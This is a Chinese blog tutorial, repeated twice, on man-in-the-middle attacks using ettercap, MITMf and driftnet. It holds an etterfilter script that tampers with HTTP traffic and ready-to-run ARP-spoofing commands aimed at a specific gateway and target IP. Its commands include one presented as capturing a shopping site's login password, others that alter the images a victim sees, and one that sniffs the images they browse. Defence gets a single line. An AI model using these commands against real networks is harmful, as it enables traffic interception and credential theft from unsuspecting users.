中间人攻击在渗透测试中的利用

博主：逍遥子
发布时间：2019 年 03 月 08 日
9431 次浏览
1 条评论
1885字数
分类：全部

### 工具介绍
- ettercap
- mitmtf
- 3070网卡（大力推荐）
### ettercap进行中间人攻击
### #替换图片
先利用`vim`新建一个` kali.filter`
写入下面代码并保存
```shell
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
	  #note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}
```
将其转变为二进制文件
```shell
etterfilter kali.filter -o kali.ef
```
执行命令
```shell
ettercap -T -q -F ig.ef -M ARP /目标ip///
```
效果如下
![QQ截图20190308154552.png][1]
### mitmf操作
### #替换网页中的图片
首先在`root`下创建一个`img`的文件夹，在文件夹中放入图片。
执行命令
```shell
python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --imgrand --img-dir /root/img
```
`PS:` 192.168.5.1 为路由器网关 192.168.5.202 为目标。
访问某宝效果如下：
![某宝效果][2]
### #获取某宝登录密码
```shell
python mitmf.py -i wlan0 --spoof  --arp --gateway 192.168.5.1 --target 192.168.5.202
```
![登录密码][3]
### #将所有的图片选择180°
```shell
python mitmf.py -i wlan0 --spoof  --arp --gateway 192.168.5.1 --target 192.168.5.202 --upsidedownternet
```
![旋转][4]
其他命令可以参考官网，这里不在演示。
### 嗅探浏览的图片
在通过`ettercap`进行中间人攻击后，我们可以利用`driftnet`来获取对方浏览的图片。命令如下：
```shell
driftnet -i waln0
```
### 防御
可以在路由器防火墙中开启`arp`攻击，来防御中间人攻击。
![防御][5]
### mitmf安装
参考文章：
[post cid="140" /]

[1]: https://blog.bbskali.cn/usr/uploads/2019/03/3406754093.png
  [2]: https://blog.bbskali.cn/usr/uploads/2019/03/193659815.png
  [3]: https://blog.bbskali.cn/usr/uploads/2019/03/4038785789.png
  [4]: https://blog.bbskali.cn/usr/uploads/2019/03/3332378769.png
  [5]: https://blog.bbskali.cn/usr/uploads/2019/03/299168633.png

工具介绍

ettercap
mitmtf
3070网卡（大力推荐）
ettercap进行中间人攻击
替换图片
先利用vim新建一个 kali.filter
写入下面代码并保存
```
if (ip.proto == TCP && tcp.dst == 80) {
 if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!"); 
    #note: replacement string is same length as original string
    msg("zapped Accept-Encoding!\n");
 }
}
if (ip.proto == TCP && tcp.src == 80) {
 replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
 replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
 msg("Filter Ran.\n");
}
```
将其转变为二进制文件
```
etterfilter kali.filter -o kali.ef
```
执行命令
```
ettercap -T -q -F ig.ef -M ARP /目标ip///
```
效果如下
mitmf操作
替换网页中的图片
首先在root下创建一个img的文件夹，在文件夹中放入图片。
执行命令
```
python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --imgrand --img-dir /root/img
```
PS: 192.168.5.1 为路由器网关 192.168.5.202 为目标。
访问某宝效果如下：
获取某宝登录密码
```
python mitmf.py -i wlan0 --spoof  --arp --gateway 192.168.5.1 --target 192.168.5.202
```
将所有的图片选择180°
```
python mitmf.py -i wlan0 --spoof  --arp --gateway 192.168.5.1 --target 192.168.5.202 --upsidedownternet
```
其他命令可以参考官网，这里不在演示。
嗅探浏览的图片
在通过ettercap进行中间人攻击后，我们可以利用driftnet来获取对方浏览的图片。命令如下：
```
driftnet -i waln0
```
防御
可以在路由器防火墙中开启arp攻击，来防御中间人攻击。
mitmf安装
参考文章：

kali安装MITMF

Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用，并利用 beef 强大的 hook ...

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/825.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

最后修改：2019 年 03 月 09 日

© 允许规范转载

可怜可怜吧！正在沿街乞讨~

Loading...

1 条评论

March 9th, 2019 at 09:55 pm

我觉得还是好深奥，不过我是个小白

回复

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

名称 *

🎲

邮箱 *

地址

JB20cm
依赖java环境，又得要配置Java环境，麻烦
JB20cm
学习了！谢谢分享！
why
全程按你的操做来的，但是最后bp打开后点不动，是死的。我增大了...
chreun
牛的
123
LED